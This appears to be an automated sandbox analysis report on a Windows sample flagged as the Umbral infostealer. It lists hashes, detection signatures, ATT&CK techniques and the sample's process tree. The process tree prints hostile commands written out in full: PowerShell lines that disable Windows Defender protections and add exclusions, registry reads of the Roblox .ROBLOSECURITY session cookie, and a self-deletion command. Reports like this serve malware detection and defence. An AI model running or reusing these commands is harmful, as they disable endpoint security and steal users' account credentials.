Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-11-2024 14:21
Behavioral task
behavioral1
Sample
b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe
Resource
win7-20240903-en
General
-
Target
b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe
-
Size
229KB
-
MD5
63c8a7e1b6b7aceb3da5f2f6b0abc53a
-
SHA1
957f75df411f22c1076838f331c14d5e6e08ee31
-
SHA256
b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b
-
SHA512
e260c30ece30075f5efd0753ff8c9073be033571fc99e830bb08a30e071fd643d0fa796a78778491fcfabe479d6f7bae995dc432ff2d00f3b91753144639132a
-
SSDEEP
6144:9loZM+rIkd8g+EtXHkv/iD4giX9UgGhZq+fiQBFUuQb8e1mLucSUi4:foZtL+EP8gI9UgGhZq+fiQBFUT33d4
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2124-1-0x00000000008A0000-0x00000000008E0000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1368 powershell.exe 2936 powershell.exe 2724 powershell.exe 2040 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe -
Deletes itself 1 IoCs
pid Process 1908 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1908 cmd.exe 2476 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2900 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2476 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 1368 powershell.exe 2936 powershell.exe 2724 powershell.exe 2488 powershell.exe 2040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe Token: SeIncreaseQuotaPrivilege 820 wmic.exe Token: SeSecurityPrivilege 820 wmic.exe Token: SeTakeOwnershipPrivilege 820 wmic.exe Token: SeLoadDriverPrivilege 820 wmic.exe Token: SeSystemProfilePrivilege 820 wmic.exe Token: SeSystemtimePrivilege 820 wmic.exe Token: SeProfSingleProcessPrivilege 820 wmic.exe Token: SeIncBasePriorityPrivilege 820 wmic.exe Token: SeCreatePagefilePrivilege 820 wmic.exe Token: SeBackupPrivilege 820 wmic.exe Token: SeRestorePrivilege 820 wmic.exe Token: SeShutdownPrivilege 820 wmic.exe Token: SeDebugPrivilege 820 wmic.exe Token: SeSystemEnvironmentPrivilege 820 wmic.exe Token: SeRemoteShutdownPrivilege 820 wmic.exe Token: SeUndockPrivilege 820 wmic.exe Token: SeManageVolumePrivilege 820 wmic.exe Token: 33 820 wmic.exe Token: 34 820 wmic.exe Token: 35 820 wmic.exe Token: SeIncreaseQuotaPrivilege 820 wmic.exe Token: SeSecurityPrivilege 820 wmic.exe Token: SeTakeOwnershipPrivilege 820 wmic.exe Token: SeLoadDriverPrivilege 820 wmic.exe Token: SeSystemProfilePrivilege 820 wmic.exe Token: SeSystemtimePrivilege 820 wmic.exe Token: SeProfSingleProcessPrivilege 820 wmic.exe Token: SeIncBasePriorityPrivilege 820 wmic.exe Token: SeCreatePagefilePrivilege 820 wmic.exe Token: SeBackupPrivilege 820 wmic.exe Token: SeRestorePrivilege 820 wmic.exe Token: SeShutdownPrivilege 820 wmic.exe Token: SeDebugPrivilege 820 wmic.exe Token: SeSystemEnvironmentPrivilege 820 wmic.exe Token: SeRemoteShutdownPrivilege 820 wmic.exe Token: SeUndockPrivilege 820 wmic.exe Token: SeManageVolumePrivilege 820 wmic.exe Token: 33 820 wmic.exe Token: 34 820 wmic.exe Token: 35 820 wmic.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeIncreaseQuotaPrivilege 2836 wmic.exe Token: SeSecurityPrivilege 2836 wmic.exe Token: SeTakeOwnershipPrivilege 2836 wmic.exe Token: SeLoadDriverPrivilege 2836 wmic.exe Token: SeSystemProfilePrivilege 2836 wmic.exe Token: SeSystemtimePrivilege 2836 wmic.exe Token: SeProfSingleProcessPrivilege 2836 wmic.exe Token: SeIncBasePriorityPrivilege 2836 wmic.exe Token: SeCreatePagefilePrivilege 2836 wmic.exe Token: SeBackupPrivilege 2836 wmic.exe Token: SeRestorePrivilege 2836 wmic.exe Token: SeShutdownPrivilege 2836 wmic.exe Token: SeDebugPrivilege 2836 wmic.exe Token: SeSystemEnvironmentPrivilege 2836 wmic.exe Token: SeRemoteShutdownPrivilege 2836 wmic.exe Token: SeUndockPrivilege 2836 wmic.exe Token: SeManageVolumePrivilege 2836 wmic.exe Token: 33 2836 wmic.exe Token: 34 2836 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2124 wrote to memory of 820 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 30 PID 2124 wrote to memory of 820 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 30 PID 2124 wrote to memory of 820 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 30 PID 2124 wrote to memory of 2228 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 33 PID 2124 wrote to memory of 2228 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 33 PID 2124 wrote to memory of 2228 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 33 PID 2124 wrote to memory of 1368 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 35 PID 2124 wrote to memory of 1368 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 35 PID 2124 wrote to memory of 1368 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 35 PID 2124 wrote to memory of 2936 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 37 PID 2124 wrote to memory of 2936 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 37 PID 2124 wrote to memory of 2936 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 37 PID 2124 wrote to memory of 2724 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 39 PID 2124 wrote to memory of 2724 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 39 PID 2124 wrote to memory of 2724 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 39 PID 2124 wrote to memory of 2488 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 41 PID 2124 wrote to memory of 2488 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 41 PID 2124 wrote to memory of 2488 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 41 PID 2124 wrote to memory of 2836 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 43 PID 2124 wrote to memory of 2836 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 43 PID 2124 wrote to memory of 2836 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 43 PID 2124 wrote to memory of 2116 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 45 PID 2124 wrote to memory of 2116 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 45 PID 2124 wrote to memory of 2116 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 45 PID 2124 wrote to memory of 1840 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 48 PID 2124 wrote to memory of 1840 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 48 PID 2124 wrote to memory of 1840 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 48 PID 2124 wrote to memory of 2040 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 50 PID 2124 wrote to memory of 2040 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 50 PID 2124 wrote to memory of 2040 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 50 PID 2124 wrote to memory of 2900 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 52 PID 2124 wrote to memory of 2900 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 52 PID 2124 wrote to memory of 2900 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 52 PID 2124 wrote to memory of 1908 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 54 PID 2124 wrote to memory of 1908 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 54 PID 2124 wrote to memory of 1908 2124 b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe 54 PID 1908 wrote to memory of 2476 1908 cmd.exe 56 PID 1908 wrote to memory of 2476 1908 cmd.exe 56 PID 1908 wrote to memory of 2476 1908 cmd.exe 56 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2228 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe"C:\Users\Admin\AppData\Local\Temp\b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe"2⤵
- Views/modifies file attributes
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:2116
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2900
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\b2bfd1500afcf35758914c882e9ced8eedd422f085eb6cb620438a92c70ef01b.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2476
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d3d25edb38149b7fdff449f8c61fde71
SHA114b74c1246ab0d3bf03c892e7dfdc469129e077d
SHA25634667ce3ac122f4a7a90f667a7f6891aa3d5e9332b9d3aa8140744977ba418ee
SHA512a8c0f3e53815c7f24f755bc003e1f89a248607da6130cc6a221d77427d2a99008898a96eb9296fd32a9c639a1977bbc7e0c9ffd30bdf8989799078bd239f98ea